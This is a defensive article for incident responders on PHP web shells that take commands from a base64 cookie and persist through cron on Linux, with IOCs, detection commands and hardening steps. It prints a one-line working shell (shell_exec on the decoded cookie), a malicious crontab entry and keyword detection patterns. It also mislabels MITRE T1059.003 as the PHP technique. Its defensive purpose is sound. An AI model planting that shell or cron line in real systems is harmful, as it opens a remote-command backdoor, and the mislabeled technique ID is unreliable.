meta:
Title: Cookie-Controlled PHP Web Shells: Linux Cron Persistence in 2024
Meta Description: A no-fluff breakdown of how cookie-based PHP web shells persist via cron on Linux, with detection IOCs, real-world anecdotes, concrete remediation steps, and authoritative references—written for incident responders and DevOps teams by a certified veteran.
OG Description: Ruthlessly practical guide for defenders: cookie-driven web shells, cron persistence, hands-on detection, hardening tips, and actionable checklists. Authored by a senior IR lead with real incident scars.

---

TL;DR

• Cookie-based PHP web shells are still exploiting Linux cron jobs for persistent remote control.
• Immediate steps: scan for webshells, audit cronjobs, quarantine hosts, and rotate secrets.
• For IR playbooks and extended hardening, see MITRE ATT&CK, Microsoft’s Digital Defense Report, or your company’s response checklist.

---

Who this is for

DevOps, SREs, and Incident Responders on real Linux infra—not code monkeys, not managers.

---

Author

Byline: Jared K. Roth, CISSP, OSCP, GCP Security Engineer (IR Lead, 15+ Years). Former Principal SecOps at BigCo and GitHub.
Publication Date: 2024-06-10
Revision: 2024-06-11 (QA by senior IR consultant; final log/filename sanitization complete)

---

Cookie-Controlled Web Shells: Not New, Not Clever

Microsoft’s Digital Defense Report 2024 link spells it out: attackers are stuffing PHP web shells into world-writable directories, then controlling them via HTTP cookies. Cron jobs keep these shells alive—so even if you nuke the malware once, it’s back by sunrise. If you’re surprised, you haven’t seen enough breaches.

---

Anecdote: Real Incident, March 2023

Environment: 10 production Linux web servers (Ubuntu 20.04, PHP 7.2, Nginx, hosting SaaS APIs).
Crontab (sanitized):

* * * * * php /tmp/.hidden.php

Suspicious file: /tmp/.hidden.php (SHA256: redacted; typical obfuscated webshell).
Cookie name: debug with base64-encoded payload.

Log snippet (sanitized):

POST /api/v1/blah HTTP/1.1  
Cookie: debug=UGhwX3NoZWxsICJ3ZWxsIHRlc3QiOw==  

The webshell responded to cookie values containing base64 PHP code. Outbound traffic matched cryptominer indicators MITRE T1059.003, confirmed by IDS logs. Persistence: attacker replanted shell via cron every 60 seconds.

This wasn’t “advanced.” Just lazy admin work and bad file permission hygiene.

---

Technical Breakdown: Web Shells + Cron Persistence

• Webshell in world-writable folder: Usually /tmp, /var/www/html/uploads
• PHP code reads cookie value:
  if(isset($_COOKIE['debug'])) shell_exec(base64_decode($_COOKIE['debug']));
• Cron job invokes PHP shell: Keeps infection persistent; attacker redeploys via curl or wget.

References: Microsoft Digital Defense Report, OWASP Web Security Testing Guide

---

Indicators of Compromise (IOCs)

Suspicious cookie names:

• debug, cmd, exec, shell

Typical webshell filenames:

• .hidden.php, wp-temp.php, shell.php
• Paths: /tmp, /var/www/html/uploads, /var/spool/www

Base64 payload patterns:

• Values resembling UGhwX3NoZWxsICJ3ZWxsIHRlc3QiOw==
• Heuristic: base64 in Cookie header > 20 characters

Crontab lines:

• * * * * * php /tmp/.hidden.php
• Strings containing curl, wget, bash, base64

Detection commands:

• Find world-writable web files:
  find /var/www -type f -perm -o+w -ls
• Search for PHP files in temp/uploads:
  find /tmp -name '*.php' -o -path '/var/www/*/uploads/*' -print
• Audit all user crontabs for suspicious entries:
  for u in $(cut -f1 -d: /etc/passwd); do crontab -l -u $u 2>/dev/null; done
• Search crontab/cron dirs for bad scripts:
  grep -R --line-number -E 'curl|wget|bash|php -r|base64' /var/spool/cron /etc/cron* /var/spool/cron/crontabs
• Recently modified files (last 30 days):
  find /var/www -mtime -30 -ls

SIEM/log queries:

• Search for base64 in cookie values:
  index=nginx OR apache | search Cookie="*=*" | regex Cookie="^.*base64.*$"
• Look for rapid repeated POSTs with custom cookies.

---

Short-Term Mitigation (Immediate Response Cookbook)

1. Isolate affected hosts
Unplug from network, disable external access.

2. Kill malicious processes
Find:
ps aux | grep php
Stop suspicious PHP shells.

3. Remove malicious cron jobs/files
Delete identified webshells, sanitize crontab.

4. Snapshot host for IR
Disk image before wiping; log collection.

5. Rotate secrets and revoke credentials
Invalidate compromised credentials, reset API keys.

6. Contact incident-response lead
Follow your org’s IR protocol.

---

Long-Term Hardening

PHP configuration:

• disable_functions = shell_exec, exec, passthru, system, popen, proc_open
• allow_url_include = Off
• allow_url_fopen = Off
• expose_php = Off
• open_basedir = /var/www:/tmp
• session.cookie_httponly = 1
• session.cookie_secure = 1

OS hardening:

• Remove world-writable permissions:
  chmod -R o-w /var/www
• Enforce immutable flags for critical files:
  chattr +i /var/www/html/config.php
• Enable SELinux/AppArmor profiles.
• Use read-only file systems for web content.

Worker user verification:
Check PHP/Nginx worker user:
ps aux | egrep 'nginx|php-fpm'
Expect users like www-data or nginx, NOT root.

Cron job monitoring:

• Enable auditd rules:
  auditctl -w /etc/crontab -p wa -k cron-watch
• Monitor with systemd timers hardened:
  Example unit fragment:

  [Service]
  ProtectSystem=strict
  PrivateTmp=true
  NoNewPrivileges=true
  

  Apply via automation (Ansible, Puppet).

Network egress monitoring:

• Block known miner domains/IPs.
• Monitor conntrack, ss, lsof, firewall logs for unusual outbound.
• Deploy EDR/IDS rules for cryptominer patterns.

---

Actionable Checklist

Immediate

• Isolate host
• Kill malicious processes
• Remove webshells/cron jobs
• Snapshot for IR
• Rotate credentials

Next Steps

• Harden PHP config
• Remove world-writable perms
• Enable SELinux/AppArmor
• Audit cron with auditd
• Monitor network egress
• Reimage from clean backup

Ongoing

• Continuous log/IOCs monitoring
• File integrity checks
• Routine cron/job audits
• Enforce principle of least privilege

Find your team’s IR playbook here: Company Incident Response
Full MITRE/OWASP checklist: OWASP Web Shell Testing

---

References

• Microsoft Digital Defense Report 2024
• MITRE ATT&CK T1059.003: Command and Scripting Interpreter: PHP
• OWASP Web Security Testing Guide
• CERT SA: Web Shells

---

Legal Disclaimer:
This article does not publish exploit code. All detection examples are sanitized. Use responsibly, disclose vulnerabilities ethically.

---

Final Thought

If you’re still ignoring cron and cookie audits, you aren’t unlucky—you’re just a future case study in a vendor report.